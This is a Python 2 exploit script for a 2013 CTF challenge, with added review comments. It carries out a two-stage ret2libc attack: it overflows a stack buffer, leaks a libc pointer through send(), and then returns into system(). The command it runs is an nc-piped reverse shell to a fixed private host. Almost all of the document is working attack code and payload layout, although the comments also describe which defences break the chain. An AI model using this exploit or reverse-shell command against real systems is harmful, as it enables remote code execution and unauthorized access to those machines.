- # /usr/bin/python
- #
- # HDCON 2013 PreQual Lv5 - exploitation, luckyzzang
- # by sweetchip
- # 2013.11.24 (stage version)
- #
- # Review notes. Python 2 script (print statement, raw_input). A two-stage
- # ret2libc proof of concept against a CTF lab service on a fixed private
- # address: stage 1 leaks one 4-byte pointer over the connection, stage 2
- # turns it into a call to system() with a command that was just received.
- # Every address and offset below is hard-coded for that challenge binary
- # and its libc build; nothing else is resolved at runtime.
- # Defender's view: the chain presumes no stack canary sits between the
- # 0x408-byte buffer and the saved frame pointer, and that the libc load
- # address is identical across connections (the pointer leaked on this
- # socket is reused on the same socket) -- inferred from the payload
- # layout, not verifiable from this page. Stack protection, PIE/ASLR, or
- # a service that does not re-enter main after a fault each break a stage.
- # The command in `cmd` (two outbound nc connections to one fixed host) is
- # the network-visible artifact of a successful run.
- from socket import *
- import struct
- import time
- # p: int -> 4 little-endian bytes; up: 4 bytes -> 1-tuple (callers take [0]).
- p = lambda x : struct.pack("<L", x)
- up = lambda x : struct.unpack("<L", x)
- ip = "192.168.32.225"
- port = 7777
- s = socket(AF_INET, SOCK_STREAM)
- s.connect((ip, port))
- print s.recv(1024) # msg
- # Fixed 0x0804xxxx addresses, i.e. a 32-bit non-PIE binary by the look of
- # it: main, the rand entry that stage 1 reads as data (presumably its GOT
- # slot), send/recv entries that are returned into (presumably PLT stubs),
- # a gadget, and a writable scratch area. `libc` is assigned but never
- # used; `system` is a placeholder that stage 1 overwrites.
- func_main = 0x080486d4
- rand = 0x0804a030
- send = 0x08048610
- recv = 0x080485f0
- libc = 0xb75b5000
- ppppr = 0x080489cc
- freespace = 0x0804a054
- system = 0
- # Pipes a shell between two outbound nc sessions to one host; needs nc and
- # /bin/sh on the target. len(cmd) is also the byte count stage 2 asks the
- # service to recv(), so the two must stay in step.
- cmd = "nc 192.168.32.43 9090 | /bin/sh |nc 192.168.32.43 9091;"
- ##################################################
- # Stage 1 - Get system addr
- ##################################################
- # Overrun the 0x408-byte buffer and the saved frame pointer so the
- # function's return lands in send(). The four values stacked after
- # ppppr are send's arguments -- send(4, rand, 4, 0); descriptor 4 is
- # presumably the server-side client socket -- so 4 bytes of the rand
- # entry come back over this connection. ppppr, by its name and the four
- # slots that follow each call, looks like a pop-4/ret gadget that unwinds
- # those arguments so execution continues at the next stacked address.
- payload = "A"*0x408 # buf
- payload += "SWCP" # sfp
- ##################################################
- payload += p(send) # send <-- RET HERE!
- payload += p(ppppr)
- payload += p(4)
- payload += p(rand) # rand
- payload += p(4)
- payload += p(0)
- ##################################################
- # Re-enter main so the service accepts a second payload on the same
- # connection; "AAAA" fills main's own return-address slot and p(4)
- # occupies the first argument slot.
- payload += p(func_main)
- payload += "AAAA"
- payload += p(4)
- ##################################################
- s.send(payload) # send
- # NOTE(review): recv(4) may return fewer than 4 bytes, or bytes of other
- # service output if the leak is not the next thing on the wire; either
- # makes the unpack below raise struct.error or yield a wrong address.
- temp = s.recv(4) # get rand ptr
- ##################################################
- ##################################################
- # calc system addr
- ##################################################
- # up() returns a 1-tuple, hence [0].
- temp = up(temp)[0]
- # offset here!
- # Both constants are offsets within the target's libc build, which this
- # page does not identify; they must be recomputed for any other libc.
- temp -= 0x34470 # rand - base_to_rand
- temp += 0x41280 # base + base_to_system
- system = temp
- print "system addr : " + hex(system)
- ##################################################
- ##################################################
- # Stage 2 - exploit
- ##################################################
- # Same overflow shape, but return into recv(4, freespace, len(cmd), 0) so
- # the command string sent below is copied into the scratch area, then into
- # system(freespace). The second "SWCP" is the slot system() would return
- # into; the script does not rely on it.
- payload = ""
- payload += "A" * 0x408
- payload += "SWCP"
- ##################################################
- payload += p(recv) # recv
- payload += p(ppppr)
- payload += p(4)
- payload += p(freespace)
- payload += p(len(cmd))
- payload += p(0)
- ##################################################
- payload += p(system) # system
- payload += "SWCP"
- payload += p(freespace) # cmd
- ##################################################
- print s.recv(1024) # msg
- s.send(payload) # sending payload
- # Fixed pause, presumably so the server is already blocked in recv()
- # before the command bytes arrive; timing-based, no acknowledgement.
- time.sleep(0.3)
- s.send(cmd) # send command
- print "Sending Payload . . ."
- # Blocks until Enter; the socket is never closed explicitly.
- raw_input("GOT SHELL?")